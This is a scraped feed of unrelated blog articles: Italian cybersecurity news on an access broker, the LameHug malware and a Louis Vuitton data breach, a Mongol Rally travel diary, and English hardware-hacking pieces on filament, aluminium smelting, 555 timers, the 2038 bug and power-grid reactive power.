Prima Tappa: Istanbul. Il Cyberpandino macina 5.000 km, tra guasti e imprevisti… ma non si ferma!
I nostri eroi Matteo Errera e Roberto Zaccardi e il Cyberpandino hanno raggiunto Istanbul dopo cinque giorni di viaggio e oltre 5.000 km macinati dalla partenza da Lampedusa e si riparte per la Cappadocia!Un traguardo importante, ma che è solo l’inizio di un’avventura che prevede altri circa 20.000 km (più o meno… ma chi li conta davvero?) verso le strade più improbabili del pianeta.
La prima vera sfida si è presentata nel cuore di Maslak, il quartiere dei meccanici di Istanbul, dove una perdita di benzina dal serbatoio ha costretto l’equipaggio a una sosta tecnica non prevista. Con l’aiuto dei ragazzi di @exclusivegaragetr, problema tappato e motore pronto a ruggire di nuovo. Almeno fino al prossimo imprevisto, perché di questi tempi pare che non manchino mai.
Dalla Turchia all’entroterra più selvaggio, il Cyberpandino ha continuato la sua corsa tra crateri lunari, villaggi fantasma e strade che in realtà non esistono nemmeno sulle mappe.
Finora la piccola panda ha affrontato una vera e propria lista nera di guasti: tubo della benzina esploso, serbatoio che si svita, puleggia dell’albero motore rotta, filtro tappato da benzina tagliata con acqua e, per non farsi mancare nulla, tubo del collettore di aspirazione devastato. Ma al nostro Magic team, Matteo Errera e Roberto Zaccardi non importa, si va avanti con grande determinazione.
E come se non bastasse, dopo una lunga notte alla frontiera tra attese infinite, controlli e caffè imbevibili, il Cyberpandino è finalmente arrivato in Turchia. Con lui ora c’è anche un nuovo compagno di viaggio: @jonny_pickup, reporter e videomaker inglese che non parla una parola di italiano, pronto a immortalare ogni istante di questa corsa surreale. Più teste a bordo significano anche più zaini da incastrare nel bagagliaio, ma la vecchia panda continua a reggere con una dignità meccanica tutta sua.
Il prossimo grande passaggio sarà la frontiera con la Russia, prevista per il 27 luglio. Fino ad allora, il viaggio continua, tra imprevisti, pezzi di ricambio e paesaggi che tolgono il fiato. Perché il Mongol Rally non è solo una gara: è un esperimento di follia su ruote, dove anche le rotture diventano storie da raccontare. E il Cyberpandino, nonostante tutto, non molla mai.
E intanto, il Cyberpandino diventa sempre più una casa viaggiante. Hanno parcheggiato sulle rive di un lago così remoto in Turchia che persino i cammelli hanno chiesto indicazioni. Location esclusiva per veri esploratori… o per chi sbaglia strada con convinzione.
Perché questo è il Mongol Rally: una partenza, un traguardo lontano… e in mezzo, solo strade da inventare e avventure da vivere.
Il Cyberpandino ha tirato fuori tutto l’arsenale da campeggio in puro “Panda-luxe”: la tenda laterale che si monta in cinque minuti, la power station da 1500W per alimentare luci e condizionatore (perché dentro si sfiorano i 40°, praticamente un hammam con più zanzare), wifi satellitare per restare connessi anche in mezzo al nulla… e ovviamente la pasta, perché puoi togliere l’italiano dall’Italia, ma non la pentola.
Ora si punta verso la Georgia, forse Armenia. Riuscirà il Cyberpandino a convincere la dogana che non è un’astronave low-cost atterrata per sbaglio in Anatolia?
Stay tuned: la strada è lunga, la tenda ancora storta e la pasta… quasi pronta.
L'articolo Prima Tappa: Istanbul. Il Cyberpandino macina 5.000 km, tra guasti e imprevisti… ma non si ferma! proviene da il blog della sicurezza informatica.
Alla scoperta dell’IaB JohnDoe7: accessi in vendita dall’uomo qualunque
Continuiamo la nostra serie di articoli sugli Initial Access Broker con un articolo su JohnDoe7 (anche noto come LORD1) che, come vedremo in seguito, usa un nome/moniker che richiama alla cinematografia o al mondo legal negli Stati Uniti.
Exploit di vulnerability 1-day
KELA Cyber ha osservato la costante offerta di exploit per vulnerabilità 1-day, il che conferma che gli IAB, come altri attori, sono interessati a colpire le aziende che non hanno applicato patch al loro ambiente in modo tempestivo. Qui in figura, su Exploit nell’Ottobre 2020, LORD1 offre un exploit RCE e LPE il cui prezzo parte da 5.000 dollari.
Il caso del software MOVEit Transfer
Nel giugno 2023, johndoe7 aka LoRD1 su XSS ed Exploit ha offerto uno script dannoso personalizzato per sfruttare la vulnerabilità di Progress MOVEit Transfer (CVE-2023-34362). Nel maggio 2023, il gruppo ransomware CL0P ha preso di mira MOVEit Transfer di Progress Software, comunemente utilizzato dalle organizzazioni per gestire le operazioni di trasferimento dei file. Hanno sfruttato la vulnerabilità zero-day SOL injection (CVE-2023-34362) per infiltrarsi nelle applicazioni web di MOVEit Transfer e ottenere un accesso non autorizzato ai database archiviati. Ciò potrebbe far pensare ad un legame tra johndoe7 e la gang CL0P …
Nel successivo esempio nei forum XSS e Exploit, gli attori malevoli “0x90” e “Present” manifestano il loro interesse nel comprare degli exploit per la CVE-2023-3519 (RCE su Citrix) e per la CVE-2022-24527 (LPE su Microsoft Connected Cache).
–
–
Report di Soc RADAR su attacchi a crypto/NFT
Secondo un report di SOCRadar, LORD1 è molto attivo nella compromissione di credenziali relative al mondo delle criptovalute e delle NFT; le analisi condotte dal gruppo di ricerca di SOCRadar rivelano che la maggior parte delle circa 1.700 minacce uniche del Dark Web rilevate dal 2021 a oggi riguardano la vendita di dati utente compromessi su scala globale. Pertanto, gli attori malevoli prendono di mira il settore delle criptovalute e delle NFT rappresentano una minaccia globale per tutti gli utenti.
La minaccia più diffusa nel settore delle criptovalute e NFT è la compromissione e la successiva vendita di informazioni personali degli utenti del settore sui forum del Dark Web.
Nel grafico precedente, fatto 100 il totale dei casi di compromissione credenziali analizzati nel periodo da SOCRadar, ogni segmento mostra la percentuale di contributo attribuita a ciascuno attore malevolo: LORD1 figura al quinto posto della TOP 10 con un contributo pari al 14 per cento.
Scenari di altre CVE sfruttate dallo IAB
ATLASSIAN BITBUCKET COMMAND INJECTION (CVE-2022-36804)
Resa nota nell’agosto 2022, CVE-2022-36804 è una vulnerabilità di iniezione di comandi che interessa più API endpoint dei server di Bitbucket. Utilizzando questa vulnerabilità, gli aggressori con accesso a un repository pubblico o con permessi di lettura a un repository Bitbucket privato, possono eseguire codice arbitrario inviando una richiesta HTTP dannosa.
FORTINET: AUTHENTICATION BYPASS VULNERABILITY (CVE-2022-40684)
Resa nota nel settembre 2022, questa vulnerabilità consente a un aggressore non autenticato di eseguire operazioni sull’interfaccia amministrativa dell’apparato FORTINET tramite richieste HTTP o HTTPs appositamente create tramite bypass dell’autenticazione utilizzando un percorso o un canale alternativo [CWE-288] in Fortinet FortiOS versione 7.2.0 fino a 7.2.1 e 7.0.0 fino a 7.0.6, FortiProxy versione 7.2.0 e versione 7.0.0 fino a 7.0.6 e FortiSwitchManager versione 7.2.0 e 7.0.0.
XSS Forum
Altre tracce di Johndoe7 dal 2022 nel forum XSS ( xss.ist/forums/104 )
–
–
–
SEVEN / SE7EN
Curiosità, “John Doe” è il nome del villain/il cattivo del film SE7EN
villains.fandom.com/it/wiki/Jo…
Negli USA il nome John Doe è usato per una vittima o un imputato sconosciuto o che si intende mantenere anonimo in un caso legale. È inoltre il nome che viene attribuito d’ufficio ai cadaveri di sconosciuti.
In Italia è l’equivalente di Ignoto o NN (dal latino Nomen Nescio).
NotaBene su 1-day: che cos’è una vulnerabilità 1-day?
Le vulnerabilità 1-day sono vulnerabilità note per le quali è disponibile una remediation patch o una mitigation, ma che non sono ancora state applicate. Il termine “un giorno” si riferisce al periodo che intercorre tra la divulgazione della vulnerabilità e l’applicazione della patch ai sistemi interessati.
A volte queste vulnerabilità vengono definite “n-day”, poiché il periodo è spesso molto più lungo di un giorno, dato che il tempo medio per l’applicazione di una patch (MTTP) è di solito compreso tra i 60 e i 150 giorni.
Purtroppo, lo sfruttamento delle vulnerabilità 1-day è spesso accelerato dal rilascio di codice exploit PoC (Proof-of-Concept) prima che gli utenti interessati abbiano il tempo necessario ad applicare una patch ai propri sistemi. Questa pratica sembra essere peggiorata da quando alcuni ricercatori di cybersecurity cercano di mettere in mostra le proprie capacità tecniche creando delle PoC, nonostante i danni che derivano da ciò.
Mentre threat actors più sofisticati effettuano il reverse-engineering di una patch per capire quale problema fosse essa destinata a risolvere e quindi sviluppano i propri exploit sulla base delle loro scoperte, i meno tecnici adottano/usano il codice della PoC disponibile pubblicamente. In questo modo la vulnerabilità può essere sfruttata da attori malevoli con minori skill tecniche che altrimenti non avrebbero avuto questa capacità senza assistenza esterna.
Un esempio recente e rilevante di vulnerabilità one-day è rappresentato da CVE-2024-1708, una falla di tipo “Autenthication bypass”, e da CVE-2024-1709, una falla di tipo Path traversal, nei server ScreenConnect di ConnectWise: solo un giorno dopo l’annuncio delle vulnerabilità, diversi ricercatori hanno rilasciato il codice di exploit PoC e i dettagli tecnici relativi alle vulnerabilità. Questo codice, unito alla facilità di identificare istanze ScreenConnect vulnerabili tramite scanner web online, ha portato a uno sfruttamento di massa e alla distribuzione di ransomware e altro malware su server privi di patch.
Conclusione
In questo articolo della serie sugli initial access broker abbia visto come il furto di credenziali possa avvenire anche attraverso attacchi che sfruttino vulnerabilità di tipo RCE e LPE e come sia fondamentale applicare patches e remediations il prima possibile … Quindi ricordiamo alcune delle best practice menzionate in precedenza per essere pronti ad ogni evenienza
- Aggiornamento costante dei sistemi
- Monitoraggio Continuo e Rilevamento delle Minacce
- Controlli di Accesso Forti/uso di Multi Factor Authentication
- Formazione e Consapevolezza dei Dipendenti
- Segmentazione/micro segmentazione della rete
Riferimenti
KelaCyber 2022 Q2 Report kelacyber.com/wp-content/uploa…
Outpost24 IAB Report outpost24.com/wp-content/uploa…
Soc Radar report socradar.io/wp-content/uploads…
Cyble underground report osintme.com/wp-content/uploads…
XSS Forum xss.ist/forums/104
Seven (Film, 1995) it.wikipedia.org/wiki/Seven
L'articolo Alla scoperta dell’IaB JohnDoe7: accessi in vendita dall’uomo qualunque proviene da il blog della sicurezza informatica.
Nylon-Like TPU Filament: Testing CC3D’s 72D TPU
Another entry in the world of interesting FDM filaments comes courtesy of CC3D with their 72D TPU filament, with [Dr. Igor Gaspar] putting it to the test in his recent video. The use of the Shore hardness D scale rather than the typical A scale is a strong indication that something is different about this TPU. The manufacturer claims ‘nylon-like’ performance, which should give this TPU filament much more hardness and resistance to abrasion. The questions are whether this filament lives up to these promises, and whether it is at all fun to print with.
TPU is of course highly hydrophilic, so keeping the filament away from moisture is essential. Printing temperature is listed on the spool as 225 – 245°C, and the filament is very bendable but not stretchable. For the testing a Bambu Lab X-1 Carbon was used, with the filament directly loaded from the filament dryer. After an overnight print session resulted in spaghetti due to warping, it was found that generic TPU settings at 240ºC with some more nylon-specific tweaks seemed to give the best results, with other FDM printers also working well that way.
The comparison was against Bambu Lab’s 68D TPU for AMS. Most noticeable is that the 72D TPU easily suffers permanent deformation, while being much more wear resistant than e.g. PLA. That said, it does indeed seem to perform more like polyamide filaments, making it perhaps an interesting alternative there. Although there’s some confusion about whether this TPU filament has polyamide added to it, it seems to be pure TPU, just like the Bambu Lab 68D filament.
youtube.com/embed/158prgcHcTE?…
The Hall-Héroult Process on a Home Scale
Although Charles Hall conducted his first successful run of the Hall-Héroult aluminium smelting process in the woodshed behind his house, it has ever since remained mostly out of reach of home chemists. It does involve electrolysis at temperatures above 1000 ℃, and can involve some frighteningly toxic chemicals, but as [Maurycy Z] demonstrates, an amateur can now perform it a bit more conveniently than Hall could.
[Maurycy] started by finding a natural source of aluminium, in this case aluminosilicate clay. He washed the clay and soaked it in warm hydrochloric acid for two days to extract the aluminium as a chloride. This also extracted quite a bit of iron, so [Maurycy] added sodium hydroxide to the solution until both aluminium and iron precipitated as hydroxides, added more sodium hydroxide until the aluminium hydroxide redissolved, filtered the solution to remove iron hydroxide, and finally added hydrochloric acid to the solution to precipitate aluminium hydroxide. He heated the aluminium hydroxide to about 800 ℃ to decompose it into the alumina, the starting material for electrolysis.
To turn this into aluminium metal, [Maurycy] used molten salt electrolysis. Alumina melts at a much higher temperature than [Maurycy]’s furnace could reach, so he used cryolite as a flux. He mixed this with his alumina and used an electric furnace to melt it in a graphite crucible. He used the crucible itself as the cathode, and a graphite rod as an anode. He does warn that this process can produce small amounts of hydrogen fluoride and fluorocarbons, so that “doing the electrolysis without ventilation is a great way to poison yourself in new and exciting ways.” The first run didn’t produce anything, but on a second attempt with a larger anode, 20 minutes of electrolysis produced 0.29 grams of aluminium metal.
[Maurycy]’s process follows the industrial Hall-Héroult process quite closely, though he does use a different procedure to purify his raw materials. If you aren’t interested in smelting aluminium, you can still cast it with a microwave oven.
Video Tape Hides Video Player
While it might not be accurate to say VHS is dead, it’s certainly not a lively format. It continues on in undeath thanks to dedicated collectors and hobbyists, some of whom may be tempted to lynch Reddit user [CommonKingfisher] for embedding a video player inside a VHS tape.
The hack started with a promotional video card via Ali Express, which is a cheap enough way to get a tiny LCD player MP4 playing micro. As you can see, there was plenty of room in the tape for the guts of this. The tape path is obviously blocked, so the tape is not playable in this format. [CommonKingfisher] claims the hack is “reversible” but since he cut a window for the LCD out of the casing of the cassette, that’s going to be pretty hard to undo. On the other hand, the ultrasonic cutter he used did make a very clean cut, and that would help with reversibility.
The fact that the thing is activated by a magnetic sensor makes us worry for the data on that tape, too, whether or not the speaker is a peizo. Ultimately it doesn’t really matter; in no universe was this tape the last surviving copy of “The Matrix”, and it’s a lot more likely this self-playing “tape” gets watched than the VHS was going to be. You can watch it yourself in the demo video embedded below.
VHS nostalgia around here usually involves replicating the tape experience, rather than repurposing the tape. We’re grateful to [George Graves] for the tip. Tips of all sorts are welcome on our friendly neighborhood tips line.
youtube.com/embed/BYrY3nFrsho?…
2025 One Hertz Challenge: A 555, but not as we know it
We did explicitly ask for projects that use a 555 timer for the One Hertz Challenge, but we weren’t expecting the 555 to be the project. Yet, here we are, with [matt venn]’s Open Source 1Hz Blinky, that blinks a light with a 555 timer… but not one you’d get from Digikey.
Hooking a 555 to blink an LED at one hertz is a bog-simple, first-electronics-project type of exercise, unless you have to make the 555 first. Rather than go big, as we have seen before, [matt venn] goes very small, with a 555 implemented on a tiny sliver of Tiny Tapeout 6.
We’ve covered projects using that tapeout before, but in case you missed it, Tiny Tapeout gives space to anyone to produce ASICs on custom silicon using an open Process Design Kit, and we have [matt venn] to thank for it. The Tiny Tapeout implementation of the 555 was actually designed by [Vincent Fusco].
Of course wiring it up is a bit more complicated than dropping in a 555 timer to the circuit: the Tiny Tapeout ASIC must be configured to use that specific project using its web interface. There’s a demo video embedded below, with some info about the project– it’s not just a blinking LED, so it’s worth seeing. The output isn’t exactly One Hertz, so it might not get the nod in the Timelord category, but it’s going to be a very strong competitor for other 555-based projects– of which we could really use more, hint-hint. You’ve got until August 19th, if you think you can use a 555 to do something more interesting than blink an LED.
youtube.com/embed/QrB6msn3UzM?…
2025 One-Hertz Challenge: Pokémon Alarm Clock Tells You It’s Time to Build the Very Best
We’ve all felt the frustration of cheap consumer electronics — especially when they aren’t actually cheap. How many of us have said “Who designed this crap? I could do better with an Arduino!” while resisting the urge to drop that new smart doorbell in the garbage disposal?
It’s an all-too familiar thought, and when it passed through [Mathieu]’s head while he was resetting the time and changing the batteries in his son’s power-hungry Pokémon alarm clock for the umpteenth time, he decided to do something about it.
The only real design requirement, imposed by [Mathieu]’s son, was that the clock’s original shell remained. Everything else, including the the controller and “antique” LCD could go. He ripped out the internals and installed an ESP32, allowing the clock to automatically sync to network time in the event of power loss. The old-school LCD was replaced with a modern, full-color TFT LCD which he scored on AliExpress for a couple of Euros.
Rather than just showing the time, the new display sports some beautiful pixel art by Woostarpixels, which [Mathieu] customized to have day and nighttime versions, even including the correct moon phase. He really packed as much into the ESP32 as possible, using 99.6% of its onboard 4 MB of flash. Code is on GitHub for the curious. All in all, the project is a multidisciplinary work of art, and it looks well-built enough to be enjoyed for years to come.
youtube.com/embed/mHJeMg9Hzjg?…
The Epochalypse: It’s Y2K, But 38 Years Later
Picture this: it’s January 19th, 2038, at exactly 03:14:07 UTC. Somewhere in a data center, a Unix system quietly ticks over its internal clock counter one more time. But instead of moving forward to 03:14:08, something strange happens. The system suddenly thinks it’s December 13th, 1901. Chaos ensues.
Welcome to the Year 2038 problem. It goes by a number of other fun names—the Unix Millennium Bug, the Epochalypse, or Y2K38. It’s another example of a fundamental computing limit that requires major human intervention to fix.
The Y2K problem was simple enough. Many computing systems stored years as two-digit figures, often for the sake of minimizing space needed on highly-constrained systems, back when RAM and storage, or space on punch cards, were strictly limited. This generally limited a system to understanding dates from 1900 to 1999; when storing the year 2000 as a two-digit number, it would instead effectively appear as 1900 instead. This promised to cause chaos in all sorts of ways, particularly in things like financial systems processing transactions in the year 2000 and onwards.
The problem was first identified in 1958 by Bob Bemer, who was working on longer time scales with genealogical software. Awareness slowly grew through the 1980s and 1990s as the critical date approached and things like long-term investment bonds started to butt up against the year 2000. Great effort was expended to overhaul and update important computer systems to enable them to store dates in a fashion that would not loop around back to 1900 after 1999.
Unlike Y2K, which was largely about how dates were stored and displayed, the 2038 problem is rooted in the fundamental way Unix-like systems keep track of time. Since the early 1970s, Unix systems have measured time as the number of seconds elapsed since January 1st, 1970, at 00:00:00 UTC. This moment in time is known as the “Unix epoch.” Recording time in this manner seemed like a perfectly reasonable approach at the time. It gave systems a simple, standardized way to handle timestamps and scheduled tasks.
The trouble is that this timestamp was traditionally stored as a signed 32-bit integer. Thanks to the magic of binary, a signed 32-bit integer can represent values from -2,147,483,648 to 2,147,483,647. When you’re counting individual seconds, that gives you about plus and minus 68 years either side of the epoch date. Do the math, and you’ll find that 2,147,483,647 seconds after January 1st, 1970 lands you at 03:14:07 UTC on January 19th, 2038. That’s the final time that can be represented using the 32-bit signed integer, having started at the Unix epoch.
What happens next isn’t pretty. When that counter tries to increment one more time, it overflows. In two’s complement arithmetic, the first bit is a signed bit. Thus, the time stamp rolls over from 2,147,483,647 to -2,147,483,648. That translates to December 13th, 1901. In January 2038, this will be roughly 136 years in the past.
For an unpatched system using a signed 32-bit integer to track Unix time, the immediate consequences could be severe. Software could malfunction when trying to calculate time differences that suddenly span more than a century in the wrong direction, and logs and database entries could quickly become corrupted as operations are performed on invalid dates. Databases might reject “historical” entries, file systems could become confused about which files are newer than others, and scheduled tasks might cease to run or run at inappropriate times.
This isn’t just some abstract future problem. If you grew up in the 20th century, it might sound far off—but 2038 is just 13 years away. In fact, the 2038 bug is already causing issues today. Any software that tries to work with dates beyond 2038—such as financial systems calculating 30-year mortgages—could fall over this bug right now.
The obvious fix is to move from 32-bit to 64-bit timestamps. A 64-bit signed integer can represent timestamps far into the future—roughly 292 billion years in fact, which should cover us until well after the heat death of the universe. Until we discover a solution for that fundamental physical limit, we should be fine.
Indeed, most modern Unix-based operating systems have already made this transition. Linux moved to 64-bit time_t values on 64-bit platforms years ago, and since version 5.6 in 2020, it supports 64-bit timestamps even on 32-bit hardware. OpenBSD has used 64-bit timestamps since May 2014, while NetBSD made the switch even earlier in 2012.
Most other modern Unix filesystems, C compilers, and database systems have switched over to 64-bit time by now. With that said, some have used hackier solutions that kick the can down the road more than fixing the problem for all of foreseeable time. For example, the ext4 filesystem uses a complicated timestamping system involving nanoseconds that runs out in 2446. XFS does a little better, but its only good up to 2486. Meanwhile, Microsoft Windows uses its own 64-bit system tracking 100-nanosecond intervals since 1 January 1601. This will overflow as soon as the year 30,828.
The challenge isn’t just in the operating systems, though. The problem affects software and embedded systems, too. Most things built today on modern architectures will probably be fine where the Year 2038 problem is concerned. However, things that were built more than a decade ago that were intended to run near-indefinitely could be a problem. Enterprise software, networking equipment, or industrial controllers could all trip over the Unix date limit come 2038 if they’re not updated beforehand. There are also obscure dependencies and bits of code out there that can cause even modern applications to suffer this problem if you’re not looking out for them.
The real engineering challenge lies in maintaining compatibility during the transition. File formats need updating and databases must be migrated without mangling dates in the process. For systems in the industrial, financial, and commercial fields where downtime is anathema, this can be very challenging work. In extreme cases, solving the problem might involve porting a whole system to a new operating system architecture, incurring huge development and maintenance costs to make the changeover.
The 2038 problem is really a case study in technical debt and the long-term consequences of design decisions. The Unix epoch seemed perfectly reasonable in 1970 when 2038 felt like science fiction. Few developing those systems thought a choice made back then would have lasting consequences over 60 years later. It’s a reminder that today’s pragmatic engineering choices might become tomorrow’s technical challenges.
The good news is that most consumer-facing systems will likely be fine. Your smartphone, laptop, and desktop computer almost certainly use 64-bit timestamps already. The real work is happening in the background—corporate system administrators updating server infrastructure, embedded systems engineers planning obsolescence cycles, and software developers auditing code for time-related assumptions. The rest of us just get to kick back and watch the (ideally) lack of fireworks as January 19, 2038 passes us by.
Arriva LameHug: il malware che utilizza l’AI per rubare i dati sui sistemi Windows
La nuova famiglia di malware LameHug utilizza il Large Language Model (LLM) per generare comandi che vengono eseguiti sui sistemi Windows compromessi. Come riportato da Bleeping Computer, LameHug è scritto in Python e utilizza l’API Hugging Face per interagire con il Qwen 2.5-Coder-32B-Instruct LLM, che può generare comandi in base ai prompt forniti. Si noti che l’utilizzo dell’infrastruttura Hugging Face può contribuire a garantire la segretezza delle comunicazioni e che l’attacco rimarrà inosservato per un periodo di tempo più lungo.
Questo modello, creato da Alibaba Cloud, èopen source e progettato specificamente per la generazione di codice, il ragionamento e l’esecuzione di istruzioni di programmazione. Può convertire descrizioni in linguaggio naturale in codice eseguibile (in più linguaggi) o comandi shell. LameHug è stato scoperto il 10 luglio di quest’anno, quando dipendenti delle autorità esecutive ucraine hanno ricevuto email dannose inviate da account hackerati.
Le email contenevano un archivio ZIP con il loader di LameHug, camuffato dai file Attachment.pif, AI_generator_uncensored_Canvas_PRO_v0.9.exe e image.py. Nei sistemi infetti, LameHug aveva il compito di eseguire comandi per effettuare ricognizioni e rubare dati generati dinamicamente tramite richieste a LLM.
Le informazioni di sistema raccolte venivano salvate in un file di testo (info.txt) e il malware cercava ricorsivamente documenti in cartelle come Documenti, Desktop, Download, per poi trasmettere i dati raccolti ai suoi operatori tramite richieste SFTP o HTTP POST. La pubblicazione sottolinea che LameHug è il primo malware documentato che utilizza LLM per eseguire attività dannose.
Sempre più spesso vediamo una preoccupante integrazione tra malware e intelligenza artificiale, che rende le minacce informatiche più sofisticate, flessibili e difficili da individuare. L’uso dei Large Language Model come “motori” per generare in tempo reale comandi dannosi permette agli attaccanti di adattarsi rapidamente, di diversificare le tecniche di attacco e di ridurre la rilevabilità da parte dei sistemi di difesa tradizionali.
LameHug rappresenta un chiaro esempio di questa nuova generazione di minacce: malware che non solo automatizzano le attività dannose, ma sono anche in grado di “ragionare” e rispondere dinamicamente agli input, sfruttando la potenza degli LLM. Un fenomeno che segna l’inizio di una nuova fase nelle minacce informatiche, in cui l’AI non è solo uno strumento difensivo, ma diventa parte integrante e attiva dell’arsenale offensivo dei cyber criminali.
L'articolo Arriva LameHug: il malware che utilizza l’AI per rubare i dati sui sistemi Windows proviene da il blog della sicurezza informatica.
USB-C-ing All The Things
Wall warts. Plug mounted power supplies that turn mains voltage into low voltage DC on a barrel jack to power a piece of equipment. We’ve all got a load of them for our various devices, most of us to the extent that it becomes annoying. [Mikeselectricstuff] has the solution, in the shape of a USB-C PD power supply designed to replace a barrel jack socket on a PCB.
The video below provides a comprehensive introduction to the topic before diving into the design. The chip in question is the CH224K, and he goes into detail on ordering the boards for yourself. As the design files are freely available, we wouldn’t be surprised if they start turning up from the usual suppliers before too long.
We like this project and we can see that it would be useful, after all it’s easy to end up in wall wart hell. We’ve remarked before that USB-C PD is a new technology done right, and this is the perfect demonstration of its potential.
youtube.com/embed/BElU9LPbaA8?…
Power Grid Stability: From Generators to Reactive Power
It hasn’t been that long since humans figured out how to create power grids that integrated multiple generators and consumers. Ever since AC won the battle of the currents, grid operators have had to deal with the issues that come with using AC instead of the far less complex DC. Instead of simply targeting a constant voltage, generators have to synchronize with the frequency of the alternating current as it cycles between positive and negative current many times per second.
Complicating matters further, the transmission lines between generators and consumers, along with any kind of transmission equipment on the lines, add their own inductive, capacitive, and resistive properties to the system before the effects of consumers are even tallied up. The result of this are phase shifts between voltage and current that have to be managed by controlling the reactive power, lest frequency oscillations and voltage swings result in a complete grid blackout.
Flowing Backwards
We tend to think of the power in our homes as something that comes out of the outlet before going into the device that’s being powered. While for DC applications this is essentially true – aside from fights over which way DC current flows – for AC applications the answer is pretty much a “It’s complicated”. After all, the primary reason why we use AC transmission is because transformers make transforming between AC voltages easy, not because an AC grid is easier to manage.
What exactly happens between an AC generator and an AC load depends on the characteristics of the load. A major part of these characteristics is covered by its power factor (PF), which describes the effect of the load on the AC phase. If the PF is 1, the load is purely resistive with no phase shift. If the PF is 0, it’s a purely reactive load and no net current flows. Most AC-powered devices have a power factor that’s somewhere between 0.5 to 0.99, meaning that they appear to be a mixed reactive and resistive load.
PF can be understood in terms of the two components that define AC power, being:
- Apparent Power (S, in volt-amperes or VA) and
- Real Power (P, in watts).
The PF is defined as the ratio of P to S (i.e. `PF = P / S). Reactive Power (Q, in var) is easily visualized as the angle theta (Θ) between P and S if we put them as respectively the leg and hypotenuse of a right triangle. Here Θ is the phase shift by which the current waveform lags the voltage. We can observe that as the phase shift increases, the apparent power increases along with reactive power. Rather than being consumed by the load, reactive power flows back to the generator, which hints at why it’s such a problematic phenomenon for grid-management.
From the above we can deduce that the PF is 1.0 if S and P are the same magnitude. Although P = I × V gets us the real power in watts, it is the apparent power that is being supplied by the generators on the grid, meaning that reactive power is effectively ‘wasted’ power. How concerning this is to you as a consumer mostly depends on whether you are being billed for watts or VAs consumed, but from a grid perspective this is the motivation behind power factor correction (PFC).
This is where capacitors are useful, as they can correct the low PF on inductive loads like electric motors, and vice versa with inductance on capacitive loads. As a rule of thumb, capacitors create reactive power, while inductors consume reactive power, meaning that for PFC the right capacitance or inductance has to be added to get the PF as close to 1.0 as possible. Since an inductor absorbs the excess (reactive) power and a capacitor supplies reactive power, if both are balanced 1:1, the PF would be 1.0.
In the case of modern switching-mode power supplies, automatic power factor correction (APFC) is applied, which switch in capacitance as needed by the current load. This is, in miniature, pretty much what the full-scale grid does throughout the network.
Traditional Grids
Based on this essential knowledge, local electrical networks were expanded from a few streets to entire cities. From there it was only a matter of time before transmission lines turned many into few, with soon transmission networks spanning entire continents. Even so, the basic principles remain the same, and thus the methods available to manage a power grid.
Spinning generators provide the AC power, along with either the creation or absorption of reactive power on account of being inductors with their large wound coils, depending on their excitation level. Since transformers are passive devices, they will always absorb reactive power, while both overhead and underground transmission lines start off providing reactive power, overhead lines start absorbing reactive power if overloaded.
In order to keep reactive power in the grid to a healthy minimum, capacitive and inductive loads are switched in or out at locations like transmission lines and switchyards. The inductive loads often taken the form of shunt reactors – basically single winding transformers – and shunt capacitors, along with active devices like synchronous condensers that are effectively simplified synchronous generators. In locations like substations the use of tap changers enables fine-grained voltage control to ease the load on nearby transmission lines. Meanwhile the synchronous generators at thermal plants can be kept idle and online to provide significant reactive power absorption capacity when not used to actively generate power.
Regardless of the exact technologies employed, these traditional grids are characterized by significant amounts of reactive power creation and absorption capacity. As loads join or leave the grid every time that consumer devices are turned off and on, the grid manager (transmission system operator, or TSO) adjusts the state of these control methods. This keeps the grid frequency and voltage within their respective narrowly defined windows.
Variable Generators
Over the past few years, most newly added generating capacity has come in the form of weather-dependent variable generators that use grid-following converters. These devices take the DC power from generally PV solar and wind turbine farms and convert them into AC. They use a phase-locked loop (PLL) to synchronize with the grid frequency, to match this AC frequency and the current voltage.
Unfortunately, these devices do not have the ability to absorb or generate reactive power, and instead blindly follow the current grid frequency and voltage, even if said grid was going through reactive power-induced oscillations. Thus instead of damping these oscillations and any voltage swings, these converters serve to amplify these issues. During the 2025 Iberian Peninsula blackout, this was identified as one of the primary causes by the Spanish TSO.
Ultimately AC power grids depend on solid reactive power management, which is why the European group of TSOs (ENTSO-E) already recommended in 2020 that grid-following converters should get replaced with grid-forming converters. These feature the ability absorb and generate reactive power through the addition of features like energy storage and are overall significantly more useful and robust when it comes to AC grid management.
Although AC doesn’t rule the roost any more in transmission networks, with high-voltage DC now the more economical option for long distances, the overwhelming part of today’s power grids still use AC. This means that reactive power management will remain one of the most essential parts of keeping power grids stable and people happy, until the day comes when we will all be switching back to DC grids, year after the switch to AC was finally completed back in 2007.
Fuga di dati Louis Vuitton: 420.000 clienti coinvolti a Hong Kong
Secondo quanto riportato guancha.cn e da altri media, Louis Vuitton ha recentemente inviato una comunicazione ai propri clienti per informarli di una fuga di dati che ha interessato circa 420.000 clienti a Hong Kong. I dati trapelati comprendono nomi, numeri di passaporto, date di nascita, indirizzi, indirizzi email, numeri di telefono, registri degli acquisti e preferenze sui prodotti. Louis Vuitton Hong Kong (LVHK) ha specificato che non sono stati coinvolti dati relativi ai pagamenti e ha dichiarato di aver notificato tempestivamente l’accaduto sia alle autorità competenti sia ai clienti interessati.
A seguito dell’incidente, l’Ufficio del Commissario per la privacy dei dati personali di Hong Kong ha comunicato di aver avviato un’indagine per accertare i fatti e verificare, tra le altre cose, se vi sia stata una notifica tardiva da parte dell’azienda. Va inoltre sottolineato che dall’inizio dell’anno Louis Vuitton ha già subito diversi gravi incidenti legati alla sicurezza dei dati.
Secondo Lin Yue, consulente capo di Lingyan Management Consulting e analista del settore dei beni di consumo, le cause principali di questi incidenti ricorrenti sarebbero da ricercare nell’abitudine, da parte dei marchi del lusso, di raccogliere quantità eccessive di dati non sempre necessari, come numeri di passaporto, e in misure di protezione e tecnologie di sicurezza non all’altezza della sensibilità dei dati gestiti.
Chen Jingjing, fondatrice di Jingjie Interactive, ha aggiunto che questa vulnerabilità riflette uno squilibrio tra la rapida digitalizzazione del settore del lusso e gli investimenti ancora insufficienti in sicurezza informatica: i marchi sono bravi a comunicare esclusività e artigianalità, ma spesso trascurano le fondamenta tecnologiche per proteggere i dati dei clienti.
Lin Yue ha inoltre sottolineato come la fuga di dati possa causare gravi danni sia per i consumatori, esposti a frodi e molestie, sia per i marchi stessi, che rischiano un crollo della fiducia, procedimenti legali e danni reputazionali. Chen Jingjing ha osservato che per i brand di lusso, la sicurezza dei dati dovrebbe diventare parte integrante dell’esperienza premium offerta ai clienti, e andrebbe inserita come priorità nelle strategie aziendali a lungo termine.
